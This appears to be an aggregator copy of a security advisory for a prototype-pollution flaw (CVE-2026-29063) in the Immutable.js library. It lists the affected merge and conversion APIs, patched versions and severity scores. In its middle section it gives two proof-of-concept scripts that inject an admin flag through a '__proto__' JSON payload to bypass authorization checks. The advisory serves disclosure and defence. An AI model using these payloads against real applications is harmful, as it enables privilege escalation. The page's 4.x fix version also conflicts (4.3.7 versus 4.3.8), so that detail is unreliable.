Логотип exploitDog
Консоль
Логотип exploitDog

exploitDog

github логотип

GHSA-wf6x-7x77-mvgw

Опубликовано: 04 мар. 2026
Источник: github
Github: Прошло ревью
CVSS4: 8.7

Описание

Immutable is vulnerable to Prototype Pollution

Impact

What kind of vulnerability is it? Who is impacted?

A Prototype Pollution is possible in immutable via the mergeDeep(), mergeDeepWith(), merge(), Map.toJS(), and Map.toObject() APIs.

Affected APIs

APINotes
mergeDeep(target, source)Iterates source keys via ObjectSeq, assigns merged[key]
mergeDeepWith(merger, target, source)Same code path
merge(target, source)Shallow variant, same assignment logic
Map.toJS()object[k] = v in toObject() with no __proto__ guard
Map.toObject()Same toObject() implementation
Map.mergeDeep(source)When source is converted to plain object

Patches

Has the problem been patched? What versions should users upgrade to?

major versionpatched version
3.x3.8.3
4.x4.3.7
5.x5.1.5

Workarounds

Is there a way for users to fix or remediate the vulnerability without upgrading?

Proof of Concept

PoC 1 — mergeDeep privilege escalation

"use strict"; const { mergeDeep } = require("immutable"); // v5.1.4 // Simulates: app merges HTTP request body (JSON) into user profile const userProfile = { id: 1, name: "Alice", role: "user" }; const requestBody = JSON.parse( '{"name":"Eve","__proto__":{"role":"admin","admin":true}}', ); const merged = mergeDeep(userProfile, requestBody); console.log("merged.name:", merged.name); // Eve (updated correctly) console.log("merged.role:", merged.role); // user (own property wins) console.log("merged.admin:", merged.admin); // true ← INJECTED via __proto__! // Common security checks — both bypassed: const isAdminByFlag = (u) => u.admin === true; const isAdminByRole = (u) => u.role === "admin"; console.log("isAdminByFlag:", isAdminByFlag(merged)); // true ← BYPASSED! console.log("isAdminByRole:", isAdminByRole(merged)); // false (own role=user wins) // Stealthy: Object.keys() hides 'admin' console.log("Object.keys:", Object.keys(merged)); // ['id', 'name', 'role'] // But property lookup reveals it: console.log("merged.admin:", merged.admin); // true

PoC 2 — All affected APIs

"use strict"; const { mergeDeep, mergeDeepWith, merge, Map } = require("immutable"); const payload = JSON.parse('{"__proto__":{"admin":true,"role":"superadmin"}}'); // 1. mergeDeep const r1 = mergeDeep({ user: "alice" }, payload); console.log("mergeDeep admin:", r1.admin); // true // 2. mergeDeepWith const r2 = mergeDeepWith((a, b) => b, { user: "alice" }, payload); console.log("mergeDeepWith admin:", r2.admin); // true // 3. merge const r3 = merge({ user: "alice" }, payload); console.log("merge admin:", r3.admin); // true // 4. Map.toJS() with __proto__ key const m = Map({ user: "alice" }).set("__proto__", { admin: true }); const r4 = m.toJS(); console.log("toJS admin:", r4.admin); // true // 5. Map.toObject() with __proto__ key const m2 = Map({ user: "alice" }).set("__proto__", { admin: true }); const r5 = m2.toObject(); console.log("toObject admin:", r5.admin); // true // 6. Nested path const nested = JSON.parse('{"profile":{"__proto__":{"admin":true}}}'); const r6 = mergeDeep({ profile: { bio: "Hello" } }, nested); console.log("nested admin:", r6.profile.admin); // true // 7. Confirm NOT global console.log("({}).admin:", {}.admin); // undefined (global safe)

Verified output against immutable@5.1.4:

mergeDeep admin: true mergeDeepWith admin: true merge admin: true toJS admin: true toObject admin: true nested admin: true ({}).admin: undefined ← global Object.prototype NOT polluted

References

Are there any links users can visit to find out more?

Ссылки

Пакеты

Наименование

immutable

npm
Затронутые версииВерсия исправления

>= 4.0.0-rc.1, < 4.3.8

4.3.8

Наименование

immutable

npm
Затронутые версииВерсия исправления

>= 5.0.0, < 5.1.5

5.1.5

Наименование

immutable

npm
Затронутые версииВерсия исправления

< 3.8.3

3.8.3

EPSS

Процентиль: 19%
0.0006
Низкий

8.7 High

CVSS4

CVE ID

CVE-2026-29063

Дефекты

CWE-1321

Связанные уязвимости

ubuntu логотип

CVE-2026-29063

ubuntu
24 дня назад

Immutable.js provides many Persistent Immutable data structures. Prior to versions 3.8.3, 4.3.7, and 5.1.5, Prototype Pollution is possible in immutable via the mergeDeep(), mergeDeepWith(), merge(), Map.toJS(), and Map.toObject() APIs. This issue has been patched in versions 3.8.3, 4.3.7, and 5.1.5.

nvd логотип

CVE-2026-29063

nvd
24 дня назад

Immutable.js provides many Persistent Immutable data structures. Prior to versions 3.8.3, 4.3.7, and 5.1.5, Prototype Pollution is possible in immutable via the mergeDeep(), mergeDeepWith(), merge(), Map.toJS(), and Map.toObject() APIs. This issue has been patched in versions 3.8.3, 4.3.7, and 5.1.5.

debian логотип

CVE-2026-29063

debian
24 дня назад

Immutable.js provides many Persistent Immutable data structures. Prior ...

EPSS

Процентиль: 19%
0.0006
Низкий

8.7 High

CVSS4

CVE ID

CVE-2026-29063

Дефекты

CWE-1321